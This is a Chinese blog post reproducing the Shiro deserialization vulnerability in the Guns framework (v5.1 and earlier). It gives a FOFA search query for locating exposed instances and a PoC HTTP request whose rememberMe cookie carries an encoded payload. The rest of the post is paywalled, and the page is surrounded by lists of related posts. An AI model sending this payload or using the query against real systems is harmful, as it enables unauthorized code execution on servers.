Guns快速开发平台 Shiro反序列化漏洞复现

已于 2023-12-03 21:04:06 修改
阅读量875 收藏 9
点赞数 11
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-02 01:19:43 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/134746556
版权

0x01 产品简介

  Guns是一个现代化的 Java 应用开发框架,基于主流技术Spring Boot 2 + Vue3,Guns的核心理念是提高开发人员开发效率,降低企业信息化系统的开发成本。

0x02 漏洞概述

 Guns v5.1 及之前的版本存在 shiro 反序列化漏洞,该漏洞源于软件存在硬编码的 shiro-key,攻击者可利用该 key 生成恶意的序列化数据,在服务器上执行任意代码,执行系统命令、或打入内存马等,获取服务器权限。

0x03 影响范围

Guns <= v5.1

0x04 复现环境

FOFA:app="Guns"

0x05 漏洞复现 

PoC

GET / HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Cookie: rememberMe=ZTE4ZUI2ZmNlQ0I1N2VlMIo/Wyvlhprf3YyQ7Uv0S1ylHBAbcj1lccluzsWCtG5HF01/y+s6ZI6S12zsdz9N+2nqYahiFMk8s+/RwNucYR8lqS9REzzXlF3orc/ZFjlRR8h0Lgfn4lpRxZnSGYCVh0neiT/ZQCT8tffIhFf0FthINEIn00tPmGJpjCTG+dc5Jmc5
了解本专栏 订阅专栏 解锁全文 超级会员免费看
0xSecl
关注
  • 11
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
GUNS框架登陆安全漏洞
qq_43081768的博客
09-02 1856
guns开源框架存在一定的登陆安全漏洞 最近为了快速搭建一个外挂小服务,为了图方便直接就用了GUNS开源框架,不得不说GUNS还是很好用的,页面权限管理,用户管理,用户角色管理,权限管理,部门管理等等,内置了挺多通用的服务的,用起来也是相当方便,改起来 也是蛮“香的”,为啥说登陆有漏洞呢,废话不多说,直接上干货: 1、用户 A 在登陆时 输入密码并且点击记住我,登陆成功后用户保存当前页面地址到 书签栏 然后使用完服务后没有点击退出登陆, 而是选择直接关闭网页,这时这个用户的session ...
Guns-Separation-其他
06-12
Guns-Separation是Guns后台管理系统的前后端分离版本,项目采用前后端分离架构,代码简洁,功能丰富,开箱即用,开创快速开发平台新趋势。Guns-Separation功能介绍:1、主控面板:控制台页面,可进行工作台,分析页...
【修Shiro序列漏洞】后台管理系统开发神器:Guns-v5.0
05-11
1.重点:原始的Guns5.0,shiro存在序列漏洞,本次发布的框架,升级shiro至1.7版本,并修了代码中存在的序列漏洞,这个版本Guns框架的优点在于易上手,比较友好。 2. 后台管理系统开发,用这个开源框架开发,一般都能从容应对。 3. Guns基于SpringBoot,致力于做更简洁的后台管理系统,完美整合springmvc + shiro + mybatis-plus + beetl!Guns项目代码简洁,注释丰富,上手容易,同时Guns包含许多基础模块(用户管理,角色管理,部门管理,字典管理等10个模块),可以直接作为一个后台管理系统的脚手架
mysql前后不分离版guns-master.zip
01-12
Guns快速开发平台 springboot2.4.2
Guns的mybatis-plus的日志打印配置
我是福强的博客
01-14 435
在配置文件application.yml中配置log-impl即可: mybatis-plus: configuration: log-impl: org.apache.ibatis.logging.stdout.StdOutImpl
Shiro序列漏洞综合
FODKING的博客
09-07 870
Apache Shiro框架提供了记住我的功能(RememberMe),在服务器上存在序列漏洞
Apache Shiro RememberMe 1.2.4 序列过程命令执行漏洞【原理扫描】
qq_46416934的博客
09-01 1165
系统将密钥硬编码在代码里,且在官方文档中并没有强调修改该密钥,导致框架使用者大多数都使用了默认密钥。检测漏洞ShiroConfig.java 是否包含 fCq+/xW488hMTCD+cmJ3aQ==,如果是使用的默认密钥则需要修改,防止被执行命令攻击。升级版本到 >=v.4.3.1(其实就是升级Shiro版本到1.7),并且重新生成一个新的秘钥替换cipherKey,保证唯一且不要泄漏。升级Shiro版本到 >=1.7,在调用的地方重新生成一个新的秘钥替换。都存在漏洞建议升级到shiro1.7版本。..
Guns快速开发——车辆管理系统.zip
12-23
Guns后台管理系统是一款项目快速开发管理系统网站搭建模板,基于Spring Boot2开发,内置主控面板、组织架构、用户管理、机构管理、职位管理、权限管理、基础数据、系统功能、通知管理、监控管理等多种功能操作模块,...
springboot快速开发架构.rar
06-30
快速开发架构模板 #### 软件架构 使用前后端分离的形式 1. api ———— 后端接口服务 2. nep-admin ———— 单页面版静态页面 3. web(单页面版) ———— 前端页面服务 4. nginx ———— 服务核心配置 #### ...
Guns后台管理系统
07-17
Guns后台管理系统源代码。导入即可运行(数据库密码为root) Guns基于SpringBoot, 致力于做更简洁的后台管理系统,完美整合springmvc + shiro + mybatis-plus + beetl + flowable!
stylefeng / Guns开发文档完整版
07-11
stylefeng / Guns开发文档完整版,V1.0的完整版,不是那种只有目录结构的,是真正的完整文档
guns多租户支持bug处理
huaya1127的专栏
09-19 510
    今日研究guns开源框架的多租户功能的时候发存在bug。租户建立成功,前端登录之后不能正常进入主页,研究之后发是由于有的默认服务端框架中在执行接口时未根据用户信息进行租户的数据源切换操作,造成在租户进入的情况下,还是访问主数据源的数据库。     修改方案为,在过滤器中直接进行数据源的切换工作。 具体操作为修改AuthJwtTokenSecurityInterceptor中的filterAction函数,增加切换数
gun linux 漏洞,所有Linux发行版仍未修严重的GNU wget漏洞
weixin_36314729的博客
05-16 203
原标题:所有Linux发行版仍未修严重的GNU wget漏洞 E安全7月8日讯 先前,安全研究员Dawid Golunski和SecuriTeam曝出GNU wget漏洞(CVE-2016-4971)。6月9日,GNU wget项目发布文件下载包新版1.18修漏洞。CVE-2016-4971 漏洞回顾GUN wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议...
渗透学习(2)漏洞扫描
跟派大星学编程
01-07 2129
一、使用nmap nmap --script=脚本名字 目标主机
Guns框架深入
qq_36059306的博客
11-20 1002
Guns框架深入 Guns分页 逻辑分页 原理:查询出所有数据缓存在前端,由前端进行分页 默认分页实方式:table.setPaginationType(“client”) 物理分页 原理:分页查询数据库中数据,封装成PageInfoBT返回给前端 实方式:1)table.setPaginationType(“server”) 2)使用selectPage进行数据库分页查询 ...
学习开源项目guns遇到的问题记录
weixin_30580943的博客
02-16 208
  启动guns项目(5.0)卡死在如下界面    原因不太明确: 最初是将logback-spring.xml 配置文件删除即可正常启动,后查找原因 不知为何springboot启动后默认激活 “dev” 配置而不是local配置,即使有下图配置,依然激活的是“dev”,最后将 pom.xml 和 application.yml有关dev的配置删除,则可正常启动; (...
guns跳过测试
chouzhuiyou4848的博客
03-29 173
run as--->maven build--->填入clean package -Dmaven.test.skip=true 转载于:https://my.oschina.n...
Evil-WinRM一键测试主机安全情况(KALI工具系列四十四)
最新发布
LNN0212的博客
07-17 571
Kali Linux 是一个功能强大、多才多艺的 Linux 发行版 ,广泛用于网络安全社区。它具有全面的预安装工具和功能集,使其成为安全测试、数字取证、事件响应和恶意软件分析的有效平台。作为使用者,你可以把它理解为一个特殊的Linux 发行版 ,集成了精心挑选的渗透测试和安全审计的工具,供渗透测试和安全设计人员使用,也可称之为平台或者框架。注意,一定只能用于自己设备的连通性测试哦!
guns java_guns——一个简便的后台管理系统
05-24
Guns Java_Guns是一个基于Spring Boot和Shiro框架的后台管理系统,它提供了一整套简便的开发工具和代码生成器,可以快速开发出一个功能丰富的后台管理系统。Guns Java_Guns采用了前后端分离的架构,前端采用了Vue.js框架,后端采用了Spring Boot和Mybatis-Plus框架,整个系统非常易于扩展和维护。 Guns Java_Guns提供了许多常见的后台管理功能,比如用户管理、角色管理、权限管理、菜单管理等,同时还提供了在线代码生成器,可以快速生成CURD代码,大大提升了开发效率。此外,Guns Java_Guns还集成了常用的第三方组件,比如Redis、Elasticsearch、Druid等,可以方便地进行缓存、搜索和数据库监控等操作。 总之,Guns Java_Guns是一个非常优秀的后台管理系统,它的开发效率高、易于扩展和维护,非常适合中小型企业快速搭建自己的后台管理系统。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值